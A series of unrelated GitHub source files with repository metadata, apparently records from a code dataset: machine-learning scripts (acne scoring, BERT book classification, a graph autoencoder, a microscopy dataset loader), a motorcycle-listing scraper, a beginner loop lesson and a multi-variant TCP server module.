pickle.load(open("ewg_prd_df.pickle","rb"))
print('Loaded from Pickle')
ewg_prd_df = pickle.load(open("ewg_prd_df.pickle","rb"))
except:
print("Building Dataset from Files...")
buildDataSet()
ewg_prd_df = pickle.load(open("ewg_prd_df.pickle","rb"))
#try:
# X = pickle.load(open("X.pickle","rb"))
#except:
#Need to change to a real function...code block simple
print('Building Dataset...')
#print(ewg_prd_df)
from collections import Counter
n = ewg_prd_df.shape[0]
print(n)
ing_lists = []
ing_cnts = Counter()
string_lists = []
for i in range(n):
ings = ewg_prd_df.iloc[i]['New_List']
str_list = ''
if type(ings) == list:
#print(type(ings), i)
for ing in ings:
if type(ing) == str:
str_list = str_list + '|' + ing
string_lists.append(str_list)
else:
print('Failed',i)
string_lists.append('')
#Build TD-IDF Matrix
from sklearn.feature_extraction.text import TfidfVectorizer
def ing_tokenizer(word):
return word.split('|')
#print(ewg_prd_df['New_List'].tolist())
vectorizer = TfidfVectorizer(tokenizer = ing_tokenizer, lowercase = False, stop_words = ['WATER','GLYCERIN','',
'TITANIUM DIOXIDE', 'IRON OXIDES','BEESWAX','METHYLPARABEN', 'PROPYLPARABEN', 'PROPYLENE GLYCOL', 'PANTHENOL', 'MICA'] )
X = vectorizer.fit_transform(string_lists)
#print(vectorizer.vocabulary_)
pickle_out = open("X.pickle","wb")
pickle.dump(X, pickle_out)
pickle_out.close()
#print(X)
print('Running Optimization...')
from sklearn.metrics import confusion_matrix
for thresh in [0]:
for test_size in [.001,.05,.01,.1]:
for alph in [.001]:
best_alpha = 0
best_test_size = 0
best_thresh_hold = 0
best_test_score = 0
best_train_score = 0
best_model = None
#Initialize Acne Score by Product
Y = []
for i in ewg_prd_df['Acne_Score']:
if i > 0 and i < 3:
Y.append(1)
elif i > 2:
Y.append(2)
else:
Y.append(0)
#Split Training and Test Data by 1/3 to 2/3
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=test_size, random_state=42)
#Build NB Model
from sklearn.naive_bayes import MultinomialNB
gnb = MultinomialNB(alpha = alph)
gnb_fit = gnb.fit(X_train,y_train)
y_pred = gnb_fit.predict(X_test)
#y_pred_tr = gnb_fit.predict(X_train)
test_score = confusion_matrix(y_test, y_pred)
#train_score = confusion_matrix(y_train, y_pred_tr)
#if test_score:
best_test_score = test_score
best_alpha = alph
best_test_size = test_size
best_thresh_hold = thresh
best_model = gnb_fit
print('Best Test Score:',gnb_fit.score(X_test,y_test), '\n', test_score) #,'\t', train_score)
print('Alpha:\t', best_alpha)
print('Test_size:\t',test_size)
print('Thresh:\t', thresh,'\n')
#print('Thresh:',thresh, 'TestSize\t',test_size,'\n' ,'\tTraining Error:', )
#print('\tTesting Error', )
pickle_out = open("nb.pickle","wb")
pickle.dump(gnb_fit, pickle_out)
pickle_out.close()
ingredient_weights = {}
i = 0
print(len(gnb.coef_), best_model.coef_, type(best_model.coef_[0]))
for i in range(gnb_fit.coef_[0].shape[0]):
#print( gnb.coef_[0][i], vectorizer.get_feature_names()[i])
ingredient_weights[vectorizer.get_feature_names()[i]] =(gnb.coef_[0][i])
#print(, gnb.coef_[i])
import operator
sorted_weights = sorted(ingredient_weights.items(), key=operator.itemgetter(1))
for i in range(1,20):
print(sorted_weights[-i])
score = best_model.predict_proba(X_train)
pred = best_model.predict(X_train)
for i in range(100):
print(ewg_prd_df.iloc[i]['Acne_Score'], score[i], pred[i])
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
#%matplotlib inline
ewg_prd_df['Acne_Score'].hist(bins=40)
plt.show()
#for i in range(gnb_fit.coef_
#print(gnb_fit.coef_)
#out = gnb_fit.predict_proba(X_test)
#for i in range(len(out)):
# print(out[i])
#print(gnb_fit.class_log_prior_)
#print(gnb_fit.feature_count_)
#print(gnb_fit.class_count_)
#print(gnb_fit.get_params())
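# --- Usage sketch (added for illustration) ---
# A hedged example of reloading the artifacts written above and scoring the
# already-vectorized products; it assumes X.pickle and nb.pickle exist from a
# previous run of this script.
#with open("X.pickle", "rb") as fx, open("nb.pickle", "rb") as fm:
#    X_saved = pickle.load(fx)
#    nb_saved = pickle.load(fm)
#print(nb_saved.predict(X_saved[:5]))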
|
SombiriX/w210_capstone
|
buildModel.py
|
buildModel.py
|
py
| 8,443 |
python
|
en
|
code
| 1 |
github-code
|
6
|
655729367
|
import os
from glob import glob
import torch_em
from . import util
URL = "https://zenodo.org/record/6546550/files/MouseEmbryos.zip?download=1"
CHECKSUM = "bf24df25e5f919489ce9e674876ff27e06af84445c48cf2900f1ab590a042622"
def _require_embryo_data(path, download):
if os.path.exists(path):
return
os.makedirs(path, exist_ok=True)
tmp_path = os.path.join(path, "mouse_embryo.zip")
util.download_source(tmp_path, URL, download, CHECKSUM)
util.unzip(tmp_path, path, remove=True)
# remove empty volume
os.remove(os.path.join(path, "Membrane", "train", "fused_paral_stack0_chan2_tp00073_raw_crop_bg_noise.h5"))
def get_mouse_embryo_dataset(
path,
name,
split,
patch_shape,
download=False,
offsets=None,
boundaries=False,
binary=False,
**kwargs,
):
"""Dataset for the segmentation of nuclei in confocal microscopy.
This dataset is stored on zenodo: https://zenodo.org/record/6546550.
"""
assert name in ("membrane", "nuclei")
assert split in ("train", "val")
assert len(patch_shape) == 3
_require_embryo_data(path, download)
# the naming of the data is inconsistent: membrane has val, nuclei has test;
# we treat nuclei:test as val
split_ = "test" if name == "nuclei" and split == "val" else split
file_paths = glob(os.path.join(path, name.capitalize(), split_, "*.h5"))
file_paths.sort()
kwargs, _ = util.add_instance_label_transform(
kwargs, add_binary_target=binary, binary=binary, boundaries=boundaries,
offsets=offsets, binary_is_exclusive=False
)
raw_key, label_key = "raw", "label"
return torch_em.default_segmentation_dataset(file_paths, raw_key, file_paths, label_key, patch_shape, **kwargs)
def get_mouse_embryo_loader(
path,
name,
split,
patch_shape,
batch_size,
download=False,
offsets=None,
boundaries=False,
binary=False,
**kwargs,
):
"""Dataloader for the segmentation of nuclei in confocal microscopy. See 'get_mouse_embryo_dataset' for details."""
ds_kwargs, loader_kwargs = util.split_kwargs(
torch_em.default_segmentation_dataset, **kwargs
)
dataset = get_mouse_embryo_dataset(
path, name, split, patch_shape,
download=download, offsets=offsets, boundaries=boundaries, binary=binary,
**ds_kwargs
)
loader = torch_em.get_data_loader(dataset, batch_size, **loader_kwargs)
return loader
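# --- Usage sketch (added for illustration; not part of the original module) ---
# A hedged example of requesting a training loader for the nuclei volumes;
# "./data/mouse_embryo" is a placeholder path and download=True fetches the
# zenodo archive on first use, so the call is left commented out.
# loader = get_mouse_embryo_loader(
#     path="./data/mouse_embryo",
#     name="nuclei",
#     split="train",
#     patch_shape=(32, 128, 128),
#     batch_size=1,
#     download=True,
#     boundaries=True,
# )
# raw_batch, label_batch = next(iter(loader))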
|
constantinpape/torch-em
|
torch_em/data/datasets/mouse_embryo.py
|
mouse_embryo.py
|
py
| 2,459 |
python
|
en
|
code
| 42 |
github-code
|
6
|
72699334907
|
import pandas as pd
from sklearn.model_selection import train_test_split
from transformers import BertTokenizer, BertModel, AutoTokenizer, AutoModelForMaskedLM
from torch import nn
import numpy as np
from sklearn.model_selection import train_test_split, KFold, StratifiedKFold
from torch.optim import Adam
from tqdm import tqdm
import torch
import os
import logging
# ************** Load data and model ************
data = pd.read_csv("../dataset/train.csv")
data_part = data.sample(n=60000, random_state=42, replace=True)
data_shuffled = data_part.sample(frac=1, random_state=42) # shuffle the data
train_data, test_data = train_test_split(
data_shuffled, test_size=0.3, random_state=42
) # split into training and test sets
K_FOLDS = 6 # K-fold training
# model for K-fold training
kf = StratifiedKFold(n_splits=K_FOLDS, shuffle=True, random_state=42)
# *************** Download the model *****************
if 1:  # download the model
print("Downloading model...")
tokenizer = AutoTokenizer.from_pretrained("bert-base-cased")
tokenizer.save_pretrained("../model/Tokenizer")
bert = AutoModelForMaskedLM.from_pretrained("bert-base-cased")
bert.save_pretrained("../model/BERT_ROW")
bert_basic = BertModel.from_pretrained("bert-base-cased")
bert_basic.save_pretrained("../model/BERT_BASIC")
print("!模型下载结束")
if 0:#
print("模型加载中...")
tokenizer = AutoTokenizer.from_pretrained("../model/Tokenizer")
bert = AutoModelForMaskedLM.from_pretrained("../model/BERT_ROW")
bert_basic = BertModel.from_pretrained("../model/BERT_BASIC")
print("模型加载完毕...")
# ***************常量和定义的类与函数************
LABELS = {
"Literature & Fiction": 0,
"Animals": 1,
"Growing Up & Facts of Life": 2,
"Humor": 3,
"Cars, Trains & Things That Go": 4,
"Fairy Tales, Folk Tales & Myths": 5,
"Activities, Crafts & Games": 6,
"Science Fiction & Fantasy": 7,
"Classics": 8,
"Mysteries & Detectives": 9,
"Action & Adventure": 10,
"Geography & Cultures": 11,
"Education & Reference": 12,
"Arts, Music & Photography": 13,
"Holidays & Celebrations": 14,
"Science, Nature & How It Works": 15,
"Early Learning": 16,
"Biographies": 17,
"History": 18,
"Children's Cookbooks": 19,
"Religions": 20,
"Sports & Outdoors": 21,
"Comics & Graphic Novels": 22,
"Computers & Technology": 23,
}
# log file output location
logging.basicConfig(filename="../log/train.log", level=logging.INFO)
# *** Wrapper class for convenient data type conversion ***************
class Dataset(torch.utils.data.Dataset):
def __init__(self, df):
self.labels = [LABELS[label] for label in df["category"]]
self.texts = [
tokenizer(
text,
padding="max_length",
max_length=512,
truncation=True,
return_tensors="pt",
)
for text in df["text"]
]
def classes(self):
return self.labels
def __len__(self):
return len(self.labels)
def get_batch_labels(self, idx):
# Fetch a batch of labels
return np.array(self.labels[idx])
def get_batch_texts(self, idx):
# Fetch a batch of inputs
return self.texts[idx]
def __getitem__(self, idx):
batch_texts = self.get_batch_texts(idx)
batch_y = self.get_batch_labels(idx)
return batch_texts, batch_y
class BertClassifier(nn.Module):
def __init__(self, dropout=0.5):
super(BertClassifier, self).__init__()
self.bert = bert_basic
self.dropout = nn.Dropout(dropout)
self.linear = nn.Linear(768, 24)
self.relu = nn.ReLU()
def forward(self, input_id, mask):
_, pooled_output = self.bert(
input_ids=input_id, attention_mask=mask, return_dict=False
)
dropout_output = self.dropout(pooled_output)
linear_output = self.linear(dropout_output)
final_layer = self.relu(linear_output)
return final_layer
def train(model, train_data, val_data, learning_rate, epochs):
# decide whether to use the GPU
use_cuda = torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
# build the training and validation sets via the Dataset class
train, val = Dataset(train_data), Dataset(val_data)
# DataLoader fetches data by batch_size; shuffle the samples during training
train_dataloader = torch.utils.data.DataLoader(train, batch_size=8, shuffle=True)
val_dataloader = torch.utils.data.DataLoader(val, batch_size=8)
# define the loss function and the optimizer
criterion = nn.CrossEntropyLoss()
optimizer = Adam(model.parameters(), lr=learning_rate)
if use_cuda:
print("Using GPU")
model = model.to(device)
criterion = criterion.to(device)
# enter the training loop
for epoch_num in range(epochs):
# two accumulators for training accuracy and loss
total_acc_train = 0
total_loss_train = 0
for train_input, train_label in tqdm(train_dataloader):
train_label = train_label.to(device)
train_label = train_label.to(torch.long)
mask = train_input["attention_mask"].to(device)
input_id = train_input["input_ids"].squeeze(1).to(device)
# get the model output
output = model(input_id, mask)
# compute the loss
batch_loss = criterion(output, train_label)
total_loss_train += batch_loss.item()
# compute the accuracy
acc = (output.argmax(dim=1) == train_label).sum().item()
total_acc_train += acc
# update the model
model.zero_grad()
batch_loss.backward()
optimizer.step()
# ------ Validate the model -----------
# two accumulators for validation accuracy and loss
total_acc_val = 0
total_loss_val = 0
# no gradients needed
with torch.no_grad():
# iterate over the validation set and evaluate with the current model
for val_input, val_label in val_dataloader:
val_label = val_label.to(device)
val_label = val_label.to(torch.long)
mask = val_input["attention_mask"].to(device)
input_id = val_input["input_ids"].squeeze(1).to(device)
output = model(input_id, mask)
batch_loss = criterion(output, val_label)
total_loss_val += batch_loss.item()
acc = (output.argmax(dim=1) == val_label).sum().item()
total_acc_val += acc
logging.info(
"\n| Epochs: %d \n| Train Loss: %.3f \n| Train Accuracy: %.3f \n| Val Loss: %.3f \n| Val Accuracy: %.3f \n",
epoch_num + 1,
total_loss_train / len(train_data),
total_acc_train / len(train_data),
total_loss_val / len(val_data),
total_acc_val / len(val_data),
)
# ************** Run section ********************
model = BertClassifier()
model.load_state_dict(torch.load("../model/BERT-1"))
learning_rate = 5e-6 # learning rate
epochs = 1 # number of training epochs
train(model, train_data, test_data, learning_rate, epochs)
torch.save(model.state_dict(), "../model/BERT-1")
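# --- Inference sketch (added for illustration; not part of the original script) ---
# A hedged example of classifying a single blurb with the model trained above.
# The example sentence is a placeholder; LABELS and tokenizer are the objects
# defined earlier in this script.
id2label = {v: k for k, v in LABELS.items()}
infer_device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
model = model.to(infer_device)
model.eval()
with torch.no_grad():
    enc = tokenizer(
        "A young detective solves a mystery at summer camp.",
        padding="max_length", max_length=512, truncation=True, return_tensors="pt",
    )
    logits = model(enc["input_ids"].to(infer_device), enc["attention_mask"].to(infer_device))
    print("Predicted category:", id2label[int(logits.argmax(dim=1))])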
|
zzhaire/dig-dig-books
|
code/train.py
|
train.py
|
py
| 7,354 |
python
|
en
|
code
| 1 |
github-code
|
6
|
36151078302
|
import sqlite3 as lite
import sys
from bs4 import BeautifulSoup
import requests
import re
def site_parsing():
max_page = 10
pages = []
id_n = 0
id_n_price = 0
for x in range(1, max_page + 1):
pages.append(requests.get('https://moto.drom.ru/sale/+/Harley-Davidson+Softail/'))
for n in pages:
soup = BeautifulSoup(n.text, 'html.parser')
moto_name = soup.find_all('a', class_="bulletinLink bull-item__self-link auto-shy")
for rev in moto_name:
id_n += 1
a = str(rev.text)
moto = re.split(r',', a)
moto_name_s = str(moto[0])
moto_year = re.sub(r'[ ]', '', moto[1])
moto_year_s = int(moto_year)
cur.execute("INSERT INTO moto VALUES(?,?,?)", (id_n, moto_name_s, moto_year_s))
price = soup.find_all('span', class_='price-block__price')
pattern = r'(\d{1}\s\d{3}\s\d{3})|(\d{3}\s\d{3})'
for rev in price:
id_n_price += 1
price_str = re.findall(pattern, rev.text)
price_str = str(price_str)
price_str = price_str.replace('\\xa0', '')
price_str = re.sub(r"[\]['(),\s]", '', price_str)
price_int = int(price_str)
cur.execute("INSERT INTO moto_price VALUES(?,?)", (id_n_price, price_int))
connect = None
try:
connect = lite.connect('motos.db')
cur = connect.cursor()
cur.execute("CREATE TABLE moto(id INT, moto TEXT, year INT)")
cur.execute("CREATE TABLE moto_price(id INT, price INT)")
site_parsing()
except lite.Error as e:
print(f"Error {e.args[0]}:")
sys.exit()
with connect:
cur = connect.cursor()
rows_join = f'SELECT * FROM moto JOIN moto_price ON moto.id = moto_price.id'
cur.execute(rows_join)
rows = cur.fetchall()
for row in rows:
print(row)
connect.close()
|
TatyanaKuleshova/lesson19-project-
|
db.py
|
db.py
|
py
| 1,878 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21545803934
|
# num = 100
#
# while num > 0:
# print(num)
# num = num + 1
# num = 1
# while num <= 100:
# if num % 2 == 0:
# print(num)
# num += 1
#
# num = 1
# son = 0
# while num <= 100:
# if num % 4 == 0:
# son += 1
# num += 1
#
# print(son)
import random
num = 1
nums = []
while num <= 10:
random_number = random.randint(1, 50)
if random_number % 2 == 1:
nums.append(random_number)
num += 1
print(nums)
|
Sanjarbek-AI/Python-688
|
Lesson-10/dars.py
|
dars.py
|
py
| 462 |
python
|
en
|
code
| 0 |
github-code
|
6
|
23948038488
|
import torch.nn as nn
import torch_geometric.nn as pyg_nn
class iVGAE_Encoder(nn.Module):
def __init__(self, in_channels, hidden_channels, out_channels):
super().__init__()
self.conv0 = pyg_nn.GCNConv(in_channels, hidden_channels)
self.conv1 = pyg_nn.GCNConv(hidden_channels, hidden_channels)
self.lin_mean = nn.Linear(hidden_channels, out_channels)
self.lin_logstd = nn.Linear(hidden_channels, out_channels)
def forward(self, x, edge_index):
h = self.conv0(x, edge_index)
h = nn.ReLU()(h)
h = self.conv1(h, edge_index)
h = nn.ReLU()(h)
mean = self.lin_mean(h)
logstd = self.lin_logstd(h)
return mean, logstd
class iVGAE_Decoder(nn.Module):
def __init__(self, in_channels, hidden_channels, out_channels):
super().__init__()
self.conv0 = pyg_nn.GCNConv(in_channels, hidden_channels)
self.conv1 = pyg_nn.GCNConv(hidden_channels, hidden_channels)
self.linear = nn.Linear(hidden_channels, out_channels)
def forward(self, z, edge_index, sigmoid=True):
h = self.conv0(z, edge_index)
h = nn.ReLU()(h)
h = self.conv1(h, edge_index)
h = nn.ReLU()(h)
out = self.linear(h)
if sigmoid:
out = nn.Sigmoid()(out)
return out
class iVGAE(pyg_nn.VGAE):
def __init__(self, encoder, decoder):
super().__init__(encoder, decoder)
def decode(self, z, pos_edge_index):
x_gen = self.decoder(z, pos_edge_index)
return x_gen
def forward(self, x, pos_edge_index):
z = self.encode(x, pos_edge_index)
x_gen = self.decode(z, pos_edge_index)
return x_gen, z
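# --- Usage sketch (added for illustration; not part of the original module) ---
# A hedged example wiring the encoder/decoder into the iVGAE wrapper and running
# one forward pass on a tiny random graph; all sizes below are placeholders.
if __name__ == "__main__":
    import torch
    encoder = iVGAE_Encoder(in_channels=16, hidden_channels=32, out_channels=8)
    decoder = iVGAE_Decoder(in_channels=8, hidden_channels=32, out_channels=16)
    model = iVGAE(encoder, decoder)
    x = torch.rand(10, 16)                      # 10 nodes, 16 features each
    edge_index = torch.randint(0, 10, (2, 40))  # 40 random directed edges
    x_gen, z = model(x, edge_index)
    print(x_gen.shape, z.shape)                 # (10, 16) and (10, 8)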
|
DavidCarlyn/iVGAE
|
models.py
|
models.py
|
py
| 1,705 |
python
|
en
|
code
| 0 |
github-code
|
6
|
25147617203
|
import errno
import logging as _logging
import socket
import socketserver
import threading
import time
from napalm import utils
# Log
logging = _logging.getLogger("SERVER")
# Temp
# utils.default_logging_setup()
try:
from twisted.internet import reactor
from twisted.internet.protocol import connectionDone, Protocol, ServerFactory
from twisted.protocols.basic import LineReceiver
except ImportError:
logging.warning("There is no Twisted module!")
"""
Conventions:
"raw" - means data with delimiters, not splitted yet.
"data" - str data.
"data_bytes" - bytes data.
Servers and clients operate only with bytes. Protocol converts bytes to str and wise versa.
"""
# Common
class Config:
DELIMITER = b"\x00"
# 1200 - the most optimal max message size to fit IP(?) frame when using TCP
RECV_SIZE = 1200 # 1024 # 4096
@property
def host(self):
return self._host
@property
def port(self):
return self._port
def __init__(self, host="", port=0, protocol_class=None):
self._host = host
self._port = port
if protocol_class:
self.protocol_class = protocol_class
class ServerConfig(Config):
logging = None
pass
class ProtocolFactory:
"""
Single point of creating protocols to be used by any server type.
"""
def __init__(self, config, app=None):
self.config = config
self.app = app
self.protocol_class = config.protocol_class if config and hasattr(config, "protocol_class") else None
self.logging = logging if self.protocol_class and self.protocol_class.is_server_protocol else \
_logging.getLogger("CLIENT")
def dispose(self):
self.logging.debug("ProtocolFactory dispose")
self.config = None
self.app = None
self.protocol_class = None
# self.logging = None
def create(self, send_bytes_method, close_connection_method, address):
if not self.protocol_class:
return None
protocol = self.protocol_class(send_bytes_method, close_connection_method, address, self.config, self.app)
self.logging.debug("ProtocolFactory create new protocol: %s for address: %s", protocol, address)
return protocol
class AbstractServer:
def __init__(self, config, app=None):
self.config = config
self.protocol_factory = ProtocolFactory(config, app)
logging.debug("Server created. %s", self)
def dispose(self):
logging.debug("Server disposing...")
self.stop()
if self.protocol_factory:
self.protocol_factory.dispose()
self.protocol_factory = None
self.config = None
logging.debug("Server disposed")
def start(self):
raise NotImplementedError
def stop(self):
raise NotImplementedError
# Twisted
# TODO try to rename all protocol to protocol (all depend on TwistedHandler)
class TwistedHandler(LineReceiver):
delimiter = b"\x00"
protocol = None
def connectionMade(self):
# Config
self.delimiter = self.factory.config.DELIMITER
# Create app protocol
address = self.transport.getPeer()
self.protocol = self.factory.protocol_factory.create(self.sendLine, self.transport.loseConnection,
(address.host, address.port))
logging.debug("connectionMade for %s protocol: %s", address, self.protocol)
def rawDataReceived(self, data):
# Not used while in line_mode
pass
def lineReceived(self, line):
# logging.debug("dataReceived for %s line: %s", self.protocol, line)
if line:
self.protocol.process_bytes_list((line,))
# def sendLine(self, line):
# logging.debug("sendData for %s line: %s", self.protocol, line)
# super().sendLine(line)
def connectionLost(self, reason=connectionDone):
logging.debug("connectionLost for %s reason: %s", self.protocol, reason)
self.protocol.dispose()
self.protocol = None
class TwistedTCPServer(AbstractServer):
factory = None
port = None
def __init__(self, config, app=None):
super().__init__(config, app)
self.factory = ServerFactory()
self.factory.protocol = TwistedHandler
# Custom references
self.factory.config = config
self.factory.protocol_factory = self.protocol_factory
self.started = False
self.__started_lock = threading.RLock()
def dispose(self):
super().dispose()
if self.factory:
self.factory.config = None
self.factory.protocol = None
self.factory.protocol_factory = None
self.factory = None
def start(self):
self.__started_lock.acquire()
if self.started:
logging.warning("Server is already running. address: %s", (self.config.host, self.config.port))
self.__started_lock.release()
return
logging.debug("Server starting... address: %s", (self.config.host, self.config.port))
self.started = True
self.__started_lock.release()
self.port = reactor.listenTCP(self.config.port, self.factory)
if not reactor.running:
reactor.run()
logging.debug("Server started")
def stop(self):
self.__started_lock.acquire()
if not self.started:
logging.warning("Server is not running. address: %s", (self.config.host, self.config.port))
self.__started_lock.release()
return
logging.debug("Server stopping...")
self.started = False
self.__started_lock.release()
if self.port:
# deferred = self.port.stopListening()
# if deferred:
# event = threading.Event()
# event.clear()
#
# def event_set():
# print("Waiting finished")
# event.set()
# deferred.addCallback(event_set)
# print("Waiting while listening stopping...", deferred)
# event.wait()
# print("Listening stopped")
self.port.loseConnection()
try:
self.port.connectionLost(None)
except Exception as error:
# Bug in Twisted: sometimes AttributeError ('Port' object has no attribute 'socket') occurs
# print("ERROR", error)
pass
self.port = None
# -reactor.stop()
# reactor.crash()
logging.debug("Server stopped")
# print("Press Enter to exit...")
# input()
# # Needed to save lobby state using atexit.register() in app
# sys.exit()
# Threaded
class ThreadedTCPHandler(socketserver.BaseRequestHandler):
# static
abort = False
buffer_bytes = b""
# is_first = True
config = None
protocol = None
def setup(self):
threading.current_thread().name += "-srv-handler"
self.config = self.server.config
self.protocol = self.server.protocol_factory.create(self.send_bytes, self.request.close,
self.client_address)
logging.debug("connectionMade for %s protocol: %s", self.client_address, self.protocol)
def finish(self):
logging.debug("connectionLost for %s", self.protocol)
self.protocol.dispose()
self.protocol = None
self.config = None
def send_bytes(self, data_bytes):
# logging.debug("sendData for %s line: %s", self.protocol, data_bytes)
self.request.sendall(data_bytes + self.config.DELIMITER)
def handle(self):
while not self.server.abort:
# Read
is_data = True
data_bytes = None
while not self.server.abort and is_data and self.config.DELIMITER not in self.buffer_bytes:
try:
data_bytes = self.request.recv(self.config.RECV_SIZE)
is_data = bool(data_bytes)
self.buffer_bytes += data_bytes
except socket.error as error:
                    # Note: the current buffer won't be processed, but it is usually empty in such cases
logging.debug(" (connectionLost (abort) for %s reason: %s)", self.protocol, error)
return
# Parse bytes
# b"command1##command2##\x00command3##\x00" -> [b"command1##command2##", b"command3##", b""]
# b"1||param||##5||param||##\x0010||param||##\x00" ->
# [b"1||param||##5||param||##", b"10||param||##", b""]
if self.buffer_bytes:
# print("TEMP SERVER config:", self.server and self.config)
data_bytes_list = self.buffer_bytes.split(self.config.DELIMITER)
self.buffer_bytes = data_bytes_list.pop()
# Process
try:
# (Try-except: because send method could be invoked during processing)
if self.protocol and data_bytes_list:
self.protocol.process_bytes_list(data_bytes_list)
# (Don't use socket.error because it causes StopIteration, which would not be caught)
# except socket.error as error:
except Exception as error:
logging.debug(" (connectionLost for %s reason: %s)", self.protocol, error)
return
if not data_bytes:
if not self.server.abort:
reason = "(Empty data received: %s)" % data_bytes
logging.debug(" (connectionLost for %s reason: %s)", self.protocol, reason)
return
class ThreadedTCPServer(AbstractServer):
server = None
def __init__(self, config, app=None):
super().__init__(config, app)
self.started = False
self.__started_lock = threading.RLock()
self.__shutdown_event = threading.Event()
self.__shutdown_event.set()
# def dispose(self):
# super().dispose()
def start(self):
if not self.config:
logging.error("Server is not initialized")
return
self.__started_lock.acquire()
if self.started:
logging.warning("Server is already running. address: %s", (self.config.host, self.config.port))
self.__started_lock.release()
return
# Create and start server
address = (self.config.host, self.config.port)
logging.debug("Server starting... address: %s", address)
self.started = True
self.__started_lock.release()
self.server = socketserver.ThreadingTCPServer(address, ThreadedTCPHandler)
self.server.protocol_factory = self.protocol_factory
self.server.config = self.config
self.server.abort = False
logging.debug("Server started")
self.__shutdown_event.clear()
try:
self.server.serve_forever()
except KeyboardInterrupt as error:
            logging.info("^C KeyboardInterrupt %s", error)
        # Here we shut down the server
logging.debug("Server shutting down...")
# (Abort other threads)
self.server.abort = True
self.server.server_close()
self.server.protocol_factory = None
self.server.config = None
self.server = None
logging.debug("Server shut down")
self.__shutdown_event.set()
# print("Press Enter to exit...")
# input()
# # Needed to save lobby state using atexit.register() in app
# sys.exit()
def stop(self):
self.__started_lock.acquire()
if not self.started:
logging.warning("Server is not running. address: %s", (self.config.host, self.config.port))
self.__started_lock.release()
return
# Preventing
logging.debug("Server stopping... address: %s", (self.config.host, self.config.port))
self.started = False
self.__started_lock.release()
t = time.time()
self.server.shutdown()
self.__shutdown_event.wait()
logging.debug("Server stopped in %f sec (95%% of time is exiting from serve_forever())", time.time() - t)
# Non-blocking
class NonBlockingTCPServer(AbstractServer):
_sock = None
def __init__(self, config, app=None):
super().__init__(config, app)
# (Needed for walking through all connections on each tick and receiving available data)
self._protocol_list = []
self._request_by_protocol = {}
self._buffer_by_protocol = {}
self._abort = False
self.started = False
self.__started_lock = threading.RLock()
self.__shutdown_event = threading.Event()
self.__shutdown_event.set()
def start(self):
if not self.config:
logging.warning("Server is not initialized")
return
address = (self.config.host, self.config.port)
logging.debug("Server starting... address: %s", address)
self.__started_lock.acquire()
if self.started:
logging.warning("Server is already running. address: %s", (self.config.host, self.config.port))
self.__started_lock.release()
return
self.started = True
self.__started_lock.release()
# (If restarting)
self._abort = False
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._sock.bind(address)
self._sock.listen()
self._sock.setblocking(0)
logging.debug("Server started")
self.__shutdown_event.clear()
try:
self._workflow(self._sock)
except KeyboardInterrupt as error:
logging.debug("^C KeyboardInterrupt %s", error)
logging.debug("Server shutting down...")
# self._abort = True
try:
self._sock.shutdown(socket.SHUT_RDWR)
except socket.error as error:
logging.error("Error while shutting down: %s", error)
self._sock.close()
self._sock = None
# (list() needed to make a copy)
for protocol in list(self._protocol_list):
protocol.dispose()
self._protocol_list.clear()
self._request_by_protocol.clear()
self._buffer_by_protocol.clear()
logging.debug("Server shut down")
# logging.debug("Server stopped")
self.__shutdown_event.set()
# (For standalone. Bad for tests)
# print("Press Enter to exit...")
# input()
# # Needed to save lobby state using atexit.register() in app
# sys.exit()
def stop(self):
logging.debug("Server stopping...")
self.__started_lock.acquire()
if not self.started:
logging.warning("Server is not running. address: %s", (self.config.host, self.config.port))
self.__started_lock.release()
return
# If was started, but yet is not stopping
self.started = False
self.__started_lock.release()
self._abort = True
self.__shutdown_event.wait()
logging.debug("Server stopped")
def _process_disconnect(self, protocol, error):
logging.debug("connectionLost for %s reason: %s", protocol, error)
protocol.dispose()
self._protocol_list.remove(protocol)
if protocol in list(self._request_by_protocol):
del self._request_by_protocol[protocol]
if protocol in list(self._buffer_by_protocol):
del self._buffer_by_protocol[protocol]
def _workflow(self, sock):
while not self._abort:
# print("SERVER. While...")
# Connect
request, address = None, None
try:
request, address = sock.accept()
# socket.error (real error is [WinError 10035])
except Exception as error:
# print("accept error:", error)
# There is no new connections - skip
pass
if request:
# New connection
                # (Bind the current socket via a default argument so each connection
                # keeps its own request object after the loop variable is rebound)
                def send_bytes(data_bytes, request=request):
                    # logging.debug("sendData for %s line: %s", self.protocol, data_bytes)
                    request.sendall(data_bytes + self.config.DELIMITER)
# Create protocol
protocol = self.protocol_factory.create(send_bytes, request.close, address)
logging.debug("connectionMade for %s protocol: %s", address, protocol)
self._protocol_list.append(protocol)
self._request_by_protocol[protocol] = request
# Walk through all connections looking for new data to receive
i = 0
            # (Iterate over a copy: disconnects below modify the list)
            for protocol in list(self._protocol_list):
i += 1
request = self._request_by_protocol[protocol]
# Read
                buffer_bytes = self._buffer_by_protocol.get(protocol, b"")
is_data = True
data_bytes = None
while is_data:
try:
data_bytes = request.recv(self.config.RECV_SIZE)
is_data = bool(data_bytes)
buffer_bytes += data_bytes
# print("SERVER. recv data_bytes:", data_bytes, "buffer_bytes:", buffer_bytes)
# socket.error
except Exception as error:
# (break) is_data = False
# print("SERVER. Error (recv)", error)
if not hasattr(error, "errno") or error.errno != errno.EWOULDBLOCK:
self._process_disconnect(protocol, error)
# Process next connection for both disconnect and no data received now
break
                # (recv() returning b"" means the peer closed the connection;
                # None here just means no data was available on this tick)
                if data_bytes == b"":
                    self._process_disconnect(protocol, "(Empty data received: %s)" % data_bytes)
                    continue
if not buffer_bytes:
continue
# Parse bytes
data_bytes_list = buffer_bytes.split(self.config.DELIMITER)
                self._buffer_by_protocol[protocol] = data_bytes_list.pop()
# Process
try:
# (Try-except: because send method could be invoked during processing)
if protocol and data_bytes_list:
logging.debug("dataReceived for %s line: %s", protocol, buffer_bytes)
protocol.process_bytes_list(data_bytes_list)
# socket.error
except Exception as error:
self._process_disconnect(protocol, error)
break
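# Minimal usage sketch (illustration only): the concrete Config and protocol classes
# live elsewhere in this package and are not shown in this excerpt, so the attribute
# names below (host, port, DELIMITER, RECV_SIZE) are assumptions based on how the
# servers above read their configuration.
#
#   config = Config(host="127.0.0.1", port=9090)
#   server = ThreadedTCPServer(config, app=my_app)
#   threading.Thread(target=server.start, daemon=True).start()
#   ...
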